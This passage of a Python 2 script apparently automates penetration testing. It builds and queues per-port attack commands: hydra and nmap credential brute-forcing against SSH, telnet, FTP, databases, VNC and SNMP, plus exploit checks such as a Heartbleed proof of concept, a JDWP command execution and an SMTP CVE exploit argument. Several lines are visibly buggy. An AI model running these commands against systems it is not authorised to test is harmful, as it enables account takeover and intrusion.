taskToRun=="whatweb" or taskToRun=="all" or taskToRun=="http": 1205 | logFilename = origPath+"/runWhatWeb.log" 1206 | if not os.path.exists(logFilename): 1207 | fullCmd="ruby "+toolsPath+"/WhatWeb/whatweb -a 3 "+hostNo+":"+portNo+" 2>&1 >> "+logFilename 1208 | if quiet==False: 1209 | print fullCmd 1210 | cmdList.append(["whatweb",hostNo,fullCmd]) 1211 | 1212 | if taskToRun=="shellshock" or taskToRun=="all" or taskToRun=="http": 1213 | logFilename = origPath+"/runShellshock_https_"+hostNo+"_"+portNo+".log" 1214 | if not os.path.exists(logFilename): 1215 | fullCmd = "python2.7 "+shellShockPath+"shocker.py --Hostname "+hostNo+" --ssl --cgilist "+shellShockPath+"/shocker-cgi_list --port "+portNo+" | tee -a "+logFilename 1216 | #fullCmd = "python2.7 "+shellShockPath+"shellshock_scanner.py "+origPath+"/portHTTPs.txt "+shellShockPath+"cgi_list_example.txt -e 2 -w "+origPath+"/resultsHTTP.csv --proto https -t 10" 1217 | if quiet==False: 1218 | print fullCmd 1219 | cmdList.append(["shellshock",hostNo,fullCmd]) 1220 | 1221 | #if taskToRun=="clusterd" or taskToRun=="all" or taskToRun=="http": 1222 | # logFilename = origPath+"/runClusterd_https_"+hostNo+"_"+portNo+".log" 1223 | # if not os.path.exists(logFilename): 1224 | # fullCmd = "cd "+clusterdPath+" && sudo python "+clusterdPath+"clusterd.py -i "+hostNo+" -p "+portNo+" --ssl | tee -a "+logFilename 1225 | # #fullCmd = "cd "+clusterdPath+" && sudo python "+clusterdPath+"clusterd.py -i "+hostNo+" -p "+portNo+" --ssl 2>&1 >> "+origPath+"/runClusterd_https_"+hostNo+"_"+portNo+".log" 1226 | # if quiet==False: 1227 | # print fullCmd 1228 | # cmdList.append(["clusterd",hostNo,fullCmd]) 1229 | 1230 | if taskToRun=="yasuo" or taskToRun=="all" or taskToRun=="http": 1231 | logFilename = origPath+"/runYasuo_https_"+hostNo+"_"+portNo+".log" 1232 | if not os.path.exists(logFilename): 1233 | fullCmd = "cd "+yasuoPath+" && sudo ruby yasuo.rb -r "+hostNo+" -p "+portNo+" -b all | sudo tee -a "+logFilename 1234 | if quiet==False: 1235 | print fullCmd 1236 | cmdList.append(["yasuo",hostNo,fullCmd]) 1237 | 1238 | if (taskToRun=="tilde" or taskToRun=="all"): 1239 | filename = origPath+"/portTilde.txt" 1240 | tildeList=[] 1241 | if os.path.exists(filename): 1242 | with open(filename) as f: 1243 | for line in f: 1244 | tildeList.append(line.strip()) 1245 | for host in tildeList: 1246 | 1247 | hostNo = host.split(":")[1].replace("//","").strip() 1248 | portNo = host.split(":")[2].strip() 1249 | logFilename = origPath+"/runTilde_"+hostNo+"_"+portNo.replace('//','')+".log" 1250 | if not os.path.exists(logFilename): 1251 | fullCmd = "cd "+tildePath+" && echo -ne '\n\n' | java -jar "+tildePath+"IIS_shortname_scanner.jar 0 20 "+host+" 2>&1 >> "+logFilename 1252 | if quiet==False: 1253 | print fullCmd 1254 | cmdList.append(["tilde",hostNo,fullCmd]) 1255 | 1256 | if (taskToRun=="ssh" or taskToRun=="all"): 1257 | if not os.path.exists(toolsPath+"/wordList_ssh_hydra.txt"): 1258 | print toolsPath+"wordList_ssh_hydra.txt does not exists." 1259 | print "wget https://raw.githubusercontent.com/milo2012/pentest_scripts/master/default_accounts_wordlist/wordList_ssh_hydra.txt -O "+toolsPath+"wordList_ssh_hydra.txt" 1260 | sys.exit() 1261 | filename = origPath+"/portSSH.txt" 1262 | sshList=[] 1263 | if os.path.exists(filename): 1264 | with open(filename) as f: 1265 | for line in f: 1266 | sshList.append(line) 1267 | for host in sshList: 1268 | hostList = host.split(":") 1269 | hostNo = hostList[0].strip() 1270 | portNo = hostList[1].strip() 1271 | 1272 | logFilename = origPath+"/runHydraSSH_"+hostNo+"_"+portNo+".log" 1273 | if not os.path.exists(logFilename): 1274 | fullCmd="hydra -s "+portNo+" -S -f -V -C "+toolsPath+"/wordList_ssh_hydra.txt "+hostNo+" ssh | tee -a "+logFilename 1275 | #fullCmd="medusa -M ssh -C "+toolsPath+"/wordList_ssh.txt -T4 -t4 -f -F -h "+hostNo+" -n "+portNo+" -O "+logFilename 1276 | if quiet==False: 1277 | print fullCmd 1278 | cmdList.append(["ssh",hostNo,fullCmd]) 1279 | 1280 | if taskToRun=="telnet" or taskToRun=="all": 1281 | if not os.path.exists(toolsPath+"/wordList_telnet.txt"): 1282 | print toolsPath+"wordList_telnet.txt does not exists" 1283 | print "wget https://raw.githubusercontent.com/milo2012/pentest_scripts/master/default_accounts_wordlist/wordList_telnet.txt -O "+toolsPath+"wordList_telnet.txt" 1284 | sys.exit() 1285 | filename = origPath+"/portTelnet.txt" 1286 | telnetList=[] 1287 | if os.path.exists(filename): 1288 | with open(filename) as f: 1289 | for line in f: 1290 | telnetList.append(line) 1291 | for host in telnetList: 1292 | hostList = host.split(":") 1293 | hostNo = hostList[0].strip() 1294 | portNo = hostList[1].strip() 1295 | 1296 | logFilename=origPath+"/runHydraTelnet_"+hostNo+"_"+portNo+".log" 1297 | if not os.path.exists(logFilename): 1298 | fullCmd="hydra -s "+portNo+" -f -V -C "+toolsPath+"/wordList_ssh_hydra.txt "+hostNo+" telnet | tee -a "+logFilename 1299 | #fullCmd="medusa -M telnet -C "+toolsPath+"/wordList_telnet.txt -T4 -t4 -f -F -h "+hostNo+" -n "+portNo+" 2>&1 >> "+logFilename 1300 | if quiet==False: 1301 | print fullCmd 1302 | cmdList.append(["telnet",hostNo,fullCmd]) 1303 | 1304 | if taskToRun=="xmpp" or taskToRun=="all" or taskToRun=="5222": 1305 | filename = origPath+"/port5222.txt" 1306 | xmppList=[] 1307 | if os.path.exists(filename): 1308 | with open(filename) as f: 1309 | for line in f: 1310 | xmppList.append(line.strip()) 1311 | for host in xmppList: 1312 | hostNo = host 1313 | logFilename = origPath+"/runXmpp_http_"+hostNo+"_"+portNo+".log" 1314 | if not os.path.exists(logFilename): 1315 | fullCmd="nmap -p 5222 --script xmpp-brute "+hostNo+" | tee -a "+logFilename 1316 | if quiet==False: 1317 | print fullCmd 1318 | cmdList.append(["xmpp",hostNo,fullCmd]) 1319 | 1320 | if taskToRun=="ftp" or taskToRun=="all": 1321 | filename = origPath+"/portFTP.txt" 1322 | ftpList=[] 1323 | if os.path.exists(filename): 1324 | with open(filename) as f: 1325 | for line in f: 1326 | ftpList.append(line) 1327 | for host in ftpList: 1328 | hostList = host.split(":") 1329 | hostNo = hostList[0].strip() 1330 | portNo = hostList[1].strip() 1331 | 1332 | logFilename=origPath+"/runHydraFTP_"+hostNo+"_"+portNo+".log" 1333 | if not os.path.exists(logFilename): 1334 | fullCmd="hydra -s "+portNo+" -f -V -C "+toolsPath+"/wordList_ssh_hydra.txt "+hostNo+" ftp | tee -a "+logFilename 1335 | #fullCmd="medusa -M ftp -C "+toolsPath+"/wordList_telnet.txt -T4 -t4 -f -F -h "+hostNo+" -n "+portNo+" 2>&1 >> "+origPath+"/runMedusaFTP.log" 1336 | if quiet==False: 1337 | print fullCmd 1338 | cmdList.append(["ftp",hostNo,fullCmd]) 1339 | 1340 | if taskToRun=="ssl" or taskToRun=="all" or taskToRun=="tlssled" or taskToRun=="sslcert" or taskToRun=="sslknownkey" or taskToRun=="sslccs" or taskToRun=="heartbleed": 1341 | filename = origPath+"/portSSL.txt" 1342 | sslList=[] 1343 | if os.path.exists(filename): 1344 | with open(filename) as f: 1345 | for line in f: 1346 | sslList.append(line) 1347 | for host in sslList: 1348 | hostList = host.split(":") 1349 | hostNo = hostList[0].strip() 1350 | portNo = hostList[1].strip() 1351 | 1352 | if taskToRun=="sslcert" or taskToRun=="ssl" or taskToRun=="all": 1353 | logFilename = origPath+"/runSSLCert_"+hostNo+"_"+portNo+".log" 1354 | if not os.path.exists(logFilename): 1355 | fullCmd = "nmap -Pn --script=ssl-cert -p "+portNo+" "+hostNo+" | tee -a "+logFilename 1356 | if quiet==False: 1357 | print fullCmd 1358 | 1359 | cmdList.append(["sslcert",hostNo,fullCmd]) 1360 | 1361 | if taskToRun=="sslknownkey" or taskToRun=="ssl" or taskToRun=="all": 1362 | logFilename = origPath+"/runSSLKnownKey_"+hostNo+"_"+portNo+".log" 1363 | if not os.path.exists(logFilename): 1364 | fullCmd = "nmap -Pn --script ssl-known-key "+hostNo+" -p "+portNo +" | tee -a "+logFilename 1365 | if quiet==False: 1366 | print fullCmd 1367 | cmdList.append(["sslknownkey",hostNo,fullCmd]) 1368 | 1369 | if taskToRun=="sslccs" or taskToRun=="ssl" or taskToRun=="all": 1370 | logFilename = origPath+"/runSSLCCS_"+hostNo+"_"+portNo+".log" 1371 | if not os.path.exists(logFilename): 1372 | fullCmd = "python "+toolsPath+"/OSSL_CCS_InjectTest.py "+hostNo+" "+portNo+" | tee -a "+logFilename 1373 | if quiet==False: 1374 | print fullCmd 1375 | cmdList.append(["sslccs",hostNo,fullCmd]) 1376 | 1377 | if taskToRun=="heartbleed" or taskToRun=="ssl" or taskToRun=="all": 1378 | logFilename = origPath+"/runSSLHeartbleed_"+hostNo+"_"+portNo+".log" 1379 | if not os.path.exists(logFilename): 1380 | fullCmd = "python "+toolsPath+"/heartbleed-poc/heartbleed-poc.py -n 1 -p "+portNo+" "+hostNo+" | tee -a "+logFilename 1381 | #fullCmd = "nmap -Pn -p "+portNo+" --script ssl-heartbleed "+hostNo+" | tee -a "+logFilename 1382 | 1383 | if quiet==False: 1384 | print fullCmd 1385 | cmdList.append(["heartbleed",hostNo,fullCmd]) 1386 | 1387 | if taskToRun=="tlssled" or taskToRun=="ssl" or taskToRun=="all": 1388 | logFilename = origPath+"/runSSLTlssled_"+hostNo+"_"+portNo+".log" 1389 | if not os.path.exists(logFilename): 1390 | fullCmd = tlssledPath+"TLSSLed_v1.3.sh "+hostNo+" "+portNo+" | tee -a "+logFilename 1391 | if quiet==False: 1392 | print fullCmd 1393 | cmdList.append(["tlssled",hostNo,fullCmd]) 1394 | 1395 | ''' 1396 | if taskToRun=="screenshot" or taskToRun=="all" or taskToRun=="peepingtom": 1397 | if not os.path.exists(origPath+"/screenshots"): 1398 | for filename in glob.glob(origPath+"/portHTTP.txt"): 1399 | fullCmd = "cd /tmp1/tools/peepingtom && python "+toolsPath+"/peepingtom/peepingtom.py -v -l "+filename 1400 | if quiet==False: 1401 | print fullCmd 1402 | cmdList.append(["screenshot",hostNo,fullCmd]) 1403 | for filename in glob.glob(origPath+"/portHTTPs.txt"): 1404 | fullCmd = "cd /tmp1/tools/peepingtom && python "+toolsPath+"/peepingtom/peepingtom.py -v -l "+filename 1405 | if quiet==False: 1406 | print fullCmd 1407 | cmdList.append(["screenshot",hostNo,fullCmd]) 1408 | ''' 1409 | if taskToRun=="161" or taskToRun=="snmp" or taskToRun=="all": 1410 | filename = origPath+"/port161.txt" 1411 | p161List=[] 1412 | if os.path.exists(filename): 1413 | with open(filename) as f: 1414 | for line in f: 1415 | p161List.append(line) 1416 | for host in p161List: 1417 | host = host.strip() 1418 | logFilename = origPath+"/runSNMP_"+host+".log" 1419 | if not os.path.exists(logFilename): 1420 | fullCmd = "sudo nmap -sU -p 161 -Pn --script snmp-brute --script-args snmp-brute.communitiesdb="+toolsPath+"/wordlist-common-snmp-community-strings.txt "+host+" | tee -a runSNMP_"+host+".log" 1421 | #fullCmd = "sudo nmap -sU -p 161 --script snmp-brute --script-args -Pn snmp-brute.communitiesdb="+toolsPath+"/wordlist-common-snmp-community-strings.txt -iL "+filename+" | tee -a "+logFilename 1422 | if quiet==False: 1423 | print fullCmd 1424 | cmdList.append(["161",hostNo,fullCmd]) 1425 | 1426 | if taskToRun=="123" or taskToRun=="ntp" or taskToRun=="all": 1427 | filename = origPath+"/port123.txt" 1428 | if os.path.exists(filename): 1429 | logFilename = origPath+"/runNTP.log" 1430 | if not os.path.exists(logFilename): 1431 | #fullCmd="nmap -sU -pU:123 -Pn -n --script=ntp-monlist -iL "+origPath+"/port123.txt" 1432 | fullCmd="sudo nmap -sU -pU:123 -Pn -n --script=ntp-monlist -iL "+origPath+"/port123.txt | tee -a "+logFilename 1433 | if quiet==False: 1434 | print fullCmd 1435 | cmdList.append(["123",hostNo,fullCmd]) 1436 | 1437 | if taskToRun=="1098" or taskToRun=="all": 1438 | filename = origPath+"/port1098.txt" 1439 | p1098List=[] 1440 | if os.path.exists(filename): 1441 | with open(filename) as f: 1442 | for line in f: 1443 | p1098List.append(line) 1444 | logFilename=origPath+"/runPort1098.log" 1445 | if not os.path.exists(logFilename): 1446 | for host in p1098List: 1447 | host = host.strip() 1448 | 1449 | #fullCmd = 'nmap --script "rmi-dumpregistry.nse" -p 1098 -iL '+origPath+"/port1098.txt" 1450 | fullCmd = 'nmap --script "rmi-dumpregistry.nse" -p 1098 -iL '+origPath+"/port1098.txt | tee -a "+logFilename 1451 | if quiet==False: 1452 | print fullCmd 1453 | cmdList.append(["1098",hostNo,fullCmd]) 1454 | 1455 | if taskToRun=="3306" or taskToRun=="all": 1456 | filename = origPath+"/port3306.txt" 1457 | p3306List=[] 1458 | if os.path.exists(filename): 1459 | with open(filename) as f: 1460 | for line in f: 1461 | p3306List.append(line) 1462 | #cmdList = [] 1463 | logFilename=origPath+"/runPort3306.log" 1464 | if not os.path.exists(logFilename): 1465 | for host in p3306List: 1466 | host = host.strip() 1467 | 1468 | fullCmd = "nmap -sV --script=mysql-empty-password -p 3306 "+host[0]+" | tee -a "+logFilename 1469 | cmdList.append(["3306".fullCmd]) 1470 | fullCmd = "nmap --script=mysql-brute -p 3306 "+host[0] 1471 | cmdList.append(["3306",hostNo,fullCmd]) 1472 | 1473 | 1474 | if taskToRun=="6379" or taskToRun=="all": 1475 | filename = origPath+"/port6379.txt" 1476 | p6379List=[] 1477 | if os.path.exists(filename): 1478 | with open(filename) as f: 1479 | for line in f: 1480 | p6379List.append(line) 1481 | fullCmd = [] 1482 | logFilename=origPath+"/runPort6379.log" 1483 | if not os.path.exists(logFilename): 1484 | for host in p6379List: 1485 | host = host.strip() 1486 | 1487 | fullCmd = "nmap -p 6379 --script redis-brute "+host[0]+" | tee -a "+logFilename 1488 | cmdList.append(["6379",hostNo,fullCmd]) 1489 | fullCmd = "nmap -p 6379 --script redis-info "+host[0]+" | tee -a "+logFilename 1490 | cmdList.append(["6379",hostNo,fullCmd]) 1491 | 1492 | 1493 | if taskToRun=="1099" or taskToRun=="all": 1494 | filename = origPath+"/port1099.txt" 1495 | p1099List=[] 1496 | if os.path.exists(filename): 1497 | with open(filename) as f: 1498 | for line in f: 1499 | p1099List.append(line) 1500 | logFilename=origPath+"/runPort1099.log" 1501 | if not os.path.exists(logFilename): 1502 | for host in p1099List: 1503 | host = host.strip() 1504 | 1505 | #fullCmd = "nmap --script=rmi-vuln-classloader -p 1099 "+host[0] 1506 | fullCmd = "nmap --script=rmi-vuln-classloader -p 1099 "+host[0]+" 2>&1 >> "+logFilename 1507 | if quiet==False: 1508 | print fullCmd 1509 | cmdList.append(["1099",hostNo,fullCmd]) 1510 | 1511 | if taskToRun=="5432" or taskToRun=="all": 1512 | filename = origPath+"/port5432.txt" 1513 | p5432List=[] 1514 | if os.path.exists(filename): 1515 | with open(filename) as f: 1516 | for line in f: 1517 | p5432List.append(line) 1518 | logFilename=origPath+"/runPort5432.log" 1519 | if not os.path.exists(logFilename): 1520 | for host in p5432List: 1521 | host = host.strip() 1522 | 1523 | #fullCmd = "nmap -p 5432 --script pgsql-brute -iL "+origPath+"/port5432.txt" 1524 | fullCmd = "nmap -p 5432 --script pgsql-brute -iL "+origPath+"/port5432.txt 2>&1 >> "+logFilename 1525 | if quiet==False: 1526 | print fullCmd 1527 | cmdList.append(["1099",hostNo,fullCmd]) 1528 | 1529 | if taskToRun=="2010" or taskToRun=="all": 1530 | filename = origPath+"/port2010.txt" 1531 | p2010List=[] 1532 | if os.path.exists(filename): 1533 | with open(filename) as f: 1534 | for line in f: 1535 | p2010List.append(line) 1536 | logFilename=origPath+"/runPort2010.log" 1537 | if not os.path.exists(logFilename): 1538 | for host in p2010List: 1539 | host = host.strip() 1540 | 1541 | #fullCmd = 'nmap -sT -p 2010 --script=+jdwp-exec --script-args cmd="date" '+host[0] 1542 | fullCmd = 'nmap -sT -p 2010 --script=+jdwp-exec --script-args cmd="date" '+host[0]+' 2>&1 >> '+origPath+"/runPort2010.log" 1543 | if quiet==False: 1544 | print fullCmd 1545 | cmdList.append(["2010",hostNo,fullCmd]) 1546 | 1547 | if taskToRun=="27017" or taskToRun=="all": 1548 | filename = origPath+"/port27017.txt" 1549 | p25017List=[] 1550 | if os.path.exists(filename): 1551 | with open(filename) as f: 1552 | for line in f: 1553 | p25017List.append(line) 1554 | logFilename=origPath+"/runPort27017.log" 1555 | if not os.path.exists(logFilename): 1556 | for host in p25017List: 1557 | host = host.strip() 1558 | 1559 | fullCmd = "nmap -p 27017 --script mongodb-brute "+host[0]+" 2>&1 >> "+logFilename 1560 | if quiet==False: 1561 | print fullCmd 1562 | cmdList.append(["27017",hostNo,fullCmd]) 1563 | 1564 | if taskToRun=="512" or taskToRun=="all": 1565 | filename = origPath+"/port512.txt" 1566 | p512List=[] 1567 | if os.path.exists(filename): 1568 | with open(filename) as f: 1569 | for line in f: 1570 | p512List.append(line) 1571 | logFilename=origPath+"/runPort512.log" 1572 | if not os.path.exists(logFilename): 1573 | for host in p512List: 1574 | host = host.strip() 1575 | 1576 | fullCmd = "nmap -p 512 --script rexec-brute "+host[0] 1577 | if quiet==False: 1578 | print fullCmd 1579 | cmdList.append(["512",hostNo,fullCmd]) 1580 | 1581 | if taskToRun=="5060" or taskToRun=="all": 1582 | filename = origPath+"/port5060.txt" 1583 | p5060List=[] 1584 | if os.path.exists(filename): 1585 | with open(filename) as f: 1586 | for line in f: 1587 | p5060List.append(line) 1588 | logFilename=origPath+"/runPort5060.log" 1589 | if not os.path.exists(logFilename): 1590 | for host in p5060List: 1591 | host = host.strip() 1592 | 1593 | fullCmd = "nmap -sU -p 5060 --script=sip-brute -iL "+origPath+"/port5060.txt 2>&1 >> "+logFilename 1594 | if quiet==False: 1595 | print fullCmd 1596 | cmdList.append(["5060",hostNo,fullCmd]) 1597 | 1598 | if taskToRun=="500" or taskToRun=="vpn" or taskToRun=="all": 1599 | filename = origPath+"/port500.txt" 1600 | if os.path.exists(filename): 1601 | p500List=[] 1602 | with open(filename) as f: 1603 | for line in f: 1604 | p500List.append(line.strip()) 1605 | #cmdList = [] 1606 | for host in p500List: 1607 | host = host.strip() 1608 | 1609 | logFilename = origPath+"/runPort500_ikescan_"+host+".log" 1610 | if not os.path.exists(logFilename): 1611 | if not os.path.exists(logFilename): 1612 | #fullCmd = "sudo ike-scan "+host 1613 | fullCmd = "sudo ike-scan "+host+" 2>&1 >> "+logFilename 1614 | cmdList.append(["500",hostNo,fullCmd]) 1615 | #fullCmd = "sudo python "+vpnPath+"ikeforce.py "+host+" -e -s 1 -w "+vpnPath+"wordlists/groupnames.dic" 1616 | #cmdList.append(fullCmd) 1617 | logFilename = origPath+"/runPort500_ikeversion_"+host+".log" 1618 | if not os.path.exists(logFilename): 1619 | if not os.path.exists(logFilename): 1620 | #fullCmd = "sudo ike-scan "+host 1621 | fullCmd = "sudo nmap -Pn -sU -p 500 --script ike-version "+host+" 2>&1 >> "+logFilename 1622 | cmdList.append(["500",hostNo,fullCmd]) 1623 | #fullCmd = "sudo python "+vpnPath+"ikeforce.py "+host+" -e -s 1 -w "+vpnPath+"wordlists/groupnames.dic" 1624 | #cmdList.append(fullCmd) 1625 | 1626 | 1627 | if taskToRun=="5900" or taskToRun=="all": 1628 | filename = origPath+"/port5900.txt" 1629 | p5900List=[] 1630 | if os.path.exists(filename): 1631 | with open(filename) as f: 1632 | for line in f: 1633 | p5900List.append(line) 1634 | logFilename=origPath+"/runPort5900.log" 1635 | if not os.path.exists(logFilename): 1636 | for host in p5900List: 1637 | host = host.strip() 1638 | #fullCmd = "nmap --script vnc-brute -p 5900 "+host 1639 | fullCmd = "nmap --script vnc-brute -p 5900 "+host+" 2>&1 >> "+logFilename 1640 | if quiet==False: 1641 | print fullCmd 1642 | cmdList.append(["5900",hostNo,fullCmd]) 1643 | 1644 | if taskToRun=="25" or taskToRun=="all": 1645 | filename = origPath+"/port25.txt" 1646 | p25List=[] 1647 | if os.path.exists(filename): 1648 | with open(filename) as f: 1649 | for line in f: 1650 | p25List.append(line) 1651 | #cmdList=[] 1652 | logFilename=origPath+"/runPort25.log" 1653 | if not os.path.exists(logFilename): 1654 | for host in smtpList: 1655 | host = host.strip() 1656 | fullCmd = "nmap -p 25 --script smtp-brute "+host 1657 | cmdList.append(["25",hostNo,fullCmd]) 1658 | fullCmd = "nmap --script=smtp-vuln-cve2010-4344 --script-args='smtp-vuln-cve2010-4344.exploit' -pT:25,465,587 "+host+" 2>&1 >> "+logFilename 1659 | cmdList.append(["25",hostNo,fullCmd]) 1660 | fullCmd = "nmap --script=smtp-vuln-cve2011-1764 -pT:25,465,587 "+host+" 2>&1 >> "+logFilename 1661 | cmdList.append(["25",hostNo,fullCmd]) 1662 | 1663 | 1664 | if taskToRun=="139" or taskToRun=="all": 1665 | filename = origPath+"/port139.txt" 1666 | p139List=[] 1667 | if os.path.exists(filename): 1668 | with open(filename) as f: 1669 | for line in f: 1670 | p139List.append(line) 1671 | logFilename=origPath+"/runPort139.log" 1672 | if not os.path.exists(logFilename): 1673 | for host in p139List: 1674 | host = host.strip() 1675 | fullCmd = "nmap --script=samba-vuln-cve-2012-1182 -p 139 "+host+" 2>&1 >> "+logFilename 1676 | if quiet==False: 1677 | print fullCmd 1678 | cmdList.append(["139",hostNo,fullCmd]) 1679 | 1680 | if taskToRun=="512" or taskToRun=="all": 1681 | filename = origPath+"/port512.txt" 1682 | if os.path.exists(filename): 1683 | logFilename=origPath+"/runPort512.log" 1684 | if not os.path.exists(logFilename): 1685 | fullCmd = "nmap -p 512 --script rexec-brute "+host+" -iL "+filename 1686 | #fullCmd = "nmap -p 512 --script rexec-brute "+host+" -iL "+filename+" 2>&1 >> "+logFilename 1687 | if quiet==False: 1688 | print fullCmd 1689 | cmdList.append(["512",hostNo,fullCmd]) 1690 | 1691 | if taskToRun=="513" or taskToRun=="all": 1692 | filename = origPath+"/port513.txt" 1693 | if os.path.exists(filename): 1694 | logFilename=origPath+"/runPort513.log" 1695 | if not os.path.exists(logFilename): 1696 | fullCmd = "nmap -p 513 --script rlogin-brute -iL "+filename+" 2>&1 >> "+logFilename 1697 | if quiet==False: 1698 | print fullCmd 1699 | cmdList.append(["513",hostNo,fullCmd]) 1700 | 1701 | if taskToRun=="554" or taskToRun=="all": 1702 | filename = origPath+"/port554.txt" 1703 | if os.path.exists(filename): 1704 | logFilename=origPath+"/runPort554.log" 1705 | if not os.path.exists(logFilename): 1706 | #cmdList=[] 1707 | fullCmd = "nmap -p 554 --script rtsp-methods -iL "+filename+" 2>&1 >> "+logFilename 1708 | cmdList.append(fullCmd) 1709 | fullCmd = "nmap --script rtsp-url-brute -p 554 -iL "+filename+" 2>&1 >> "+logFilename 1710 | cmdList.append(["554",hostNo,fullCmd]) 1711 | 1712 | if taskToRun=="902" or taskToRun=="all": 1713 | filename = origPath+"/port902.txt" 1714 | if os.path.exists(filename): 1715 | logFilename=origPath+"/runPort902.log" 1716 | if not os.path.exists(logFilename): 1717 | fullCmd = "nmap -p 902 --script vmauthd-brute -iL "+filename+" 2>&1 >> "+logFilename 1718 | if quiet==False: 1719 | print fullCmd 1720 | cmdList.append(["902",hostNo,fullCmd]) 1721 | 1722 | if taskToRun=="2002" or taskToRun=="all": 1723 | filename = origPath+"/port2002.txt" 1724 | if os.path.exists(filename): 1725 | #cmdList = [] 1726 | logFilename=origPath+"/runPort2002.log" 1727 | if not os.path.exists(logFilename): 1728 | for host in p2002ListList: 1729 | host = host.strip() 1730 | 1731 | fullCmd = "nmap -p 2002 --script rpcap-brute -iL "+filename+" 2>&1 >> "+logFilename 1732 | cmdList.append(["2002",hostNo,fullCmd]) 1733 | fullCmd = "nmap -p 2002 --script rpcap-info -iL "+filename+" 2>&1 >> "+logFilename 1734 | cmdList.append(["2002",hostNo,fullCmd]) 1735 | 1736 | 1737 | if taskToRun=="2401" or taskToRun=="all": 1738 | filename = origPath+"/port2401.txt" 1739 | p2401List=[] 1740 | if os.path.exists(filename): 1741 | with open(filename) as f: 1742 | for line in f: 1743 | p2401List.append(line) 1744 | #cmdList = [] 1745 | logFilename=origPath+"/runPort2401.log" 1746 | if not os.path.exists(logFilename): 1747 | for host in p2401List: 1748 | host = host.strip() 1749 | 1750 | fullCmd = "nmap -p 2401 --script cvs-brute "+host+" 2>&1 >> "+logFilename 1751 | cmdList.append(["2401",hostNo,fullCmd]) 1752 | fullCmd = "nmap -p 2401 --script cvs-brute-repository "+host+" 2>&1 >> "+logFilename 1753 | cmdList.append(["2401",hostNo,fullCmd]) 1754 | 1755 | if taskToRun=="8098" or taskToRun=="all": 1756 | filename = origPath+"/port8098.txt" 1757 | p8098List=[] 1758 | if os.path.exists(filename): 1759 | with open(filename) as f: 1760 | for line in f: 1761 | p8098List.append(line) 1762 | 1763 | logFilename=origPath+"/runPort8098.log" 1764 | if not os.path.exists(logFilename): 1765 | for host in p8098List: 1766 | host = host.strip() 1767 | 1768 | fullCmd = "nmap -p 8098 --script riak-http-info "+host+" 2>&1 >> "+logFilename 1769 | if quiet==False: 1770 | print fullCmd 1771 | cmdList.append(["8098",hostNo,fullCmd]) 1772 | 1773 | if taskToRun=="9160" or taskToRun=="all": 1774 | filename = origPath+"/port9160.txt" 1775 | if os.path.exists(filename): 1776 | logFilename=origPath+"/runPort9160.log" 1777 | if not os.path.exists(logFilename): 1778 | for host in p9160List: 1779 | host = host.strip() 1780 | 1781 | fullCmd = "nmap -p 9160 --script=cassandra-brute "+host+" 2>&1 >> "+logFilename 1782 | if quiet==False: 1783 | print fullCmd 1784 | cmdList.append(["9160",hostNo,fullCmd]) 1785 | 1786 | if taskToRun=="873" or taskToRun=="all": 1787 | filename = origPath+"/port873.txt" 1788 | p873List=[] 1789 | if os.path.exists(filename): 1790 | with open(filename) as f: 1791 | for line in f: 1792 | p873List.append(line) 1793 | #cmdList = [] 1794 | logFilename=origPath+"/runPort873.log" 1795 | if not os.path.exists(logFilename): 1796 | for host in p873List: 1797 | host = host.strip() 1798 | 1799 | fullCmd = "nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' "+host+" 2>&1 >> "+logFilename 1800 | cmdList.append(["873",hostNo,fullCmd]) 1801 | fullCmd = "nmap -p 873 --script rsync-list-modules "+host+" 2>&1 >> "+logFilename 1802 | cmdList.append(["873",hostNo,fullCmd]) 1803 | 1804 | 1805 | if taskToRun=="1080" or taskToRun=="all": 1806 | filename = origPath+"/port1080.txt" 1807 | p1080List=[] 1808 | if os.path.exists(filename): 1809 | with open(filename) as f: 1810 | for line in f: 1811 | p1080List.append(line) 1812 | #cmdList = [] 1813 | logFilename=origPath+"/runPort1080.log" 1814 | if not os.path.exists(logFilename): 1815 | for host in p1080List: 1816 | host = host.strip() 1817 | 1818 | fullCmd = "nmap -p 1080 --script socks-auth-info "+host+" 2>&1 >> "+logFilename 1819 | cmdList.append(["1080",hostNo,fullCmd]) 1820 | fullCmd = "nmap --script socks-brute -p 1080 "+host+" 2>&1 >> "+logFilename 1821 | cmdList.append(["1080",hostNo,fullCmd]) 1822 | 1823 | if taskToRun=="1723" or taskToRun=="all": 1824 | filename = origPath+"/port1723.txt" 1825 | p1723List=[] 1826 | if os.path.exists(filename): 1827 | with open(filename) as f: 1828 | for line in f: 1829 | p1723List.append(line) 1830 | logFilename=origPath+"/runPort1723.log" 1831 | if not os.path.exists(logFilename): 1832 | for host in p1723List: 1833 | host = host.strip() 1834 | 1835 | fullCmd = "nmap -sV -p 1723 "+host+" 2>&1 >> "+logFilename 1836 | if quiet==False: 1837 | print fullCmd 1838 | cmdList.append(["1723",hostNo,fullCmd]) 1839 | 1840 | 1841 | if taskToRun=="3389" or taskToRun=="all": 1842 | filename = origPath+"/port3389.txt" 1843 | p3389List=[] 1844 | if os.path.exists(filename): 1845 | #cmdList = [] 1846 | logFilename=origPath+"/runPort3389.log" 1847 | if not os.path.exists(logFilename): 1848 | for host in p3389List: 1849 | host = host.strip() 1850 | 1851 | fullCmd = "nmap -p 3389 --script rdp-enum-encryption "+host+" 2>&1 >> "+logFilename 1852 | cmdList.append(["3389",hostNo,fullCmd]) 1853 | fullCmd = "nmap -sV --script=rdp-ms12-020 -p 3389 "+host+" 2>&1 >> "+logFilename 1854 | cmdList.append(["3389",hostNo,fullCmd]) 1855 | 1856 | if taskToRun=="5432" or taskToRun=="all": 1857 | filename = origPath+"/port5432.txt" 1858 | p5432List=[] 1859 | if os.path.exists(filename): 1860 | with open(filename) as f: 1861 | for line in f: 1862 | line = line.strip() 1863 | p5432List.append(line) 1864 | for host in p5432List: 1865 | host = host.strip() 1866 | logFilename=origPath+"/runPort5432_"+host+".log" 1867 | if not os.path.exists(logFilename): 1868 | fullCmd = "nmap -p 5432 --script pgsql-brute "+host+" 2>&1 >> "+logFilename 1869 | if quiet==False: 1870 | print fullCmd 1871 | cmdList.append(["5432",hostNo,fullCmd]) 1872 | 1873 | if taskToRun=="5666" or taskToRun=="all": 1874 | filename = origPath+"/port5666.txt" 1875 | p5666List=[] 1876 | if os.path.exists(filename): 1877 | with open(filename) as f: 1878 | for line in f: 1879 | p5666List.append(line) 1880 | logFilename=origPath+"/runPort5666.log" 1881 | if not os.path.exists(logFilename): 1882 | for host in p5666List: 1883 | host = host.strip() 1884 | fullCmd = "nmap --script nrpe-enum -p 5666 "+host+" 2>&1 >> "+logFilename 1885 | if quiet==False: 1886 | print fullCmd 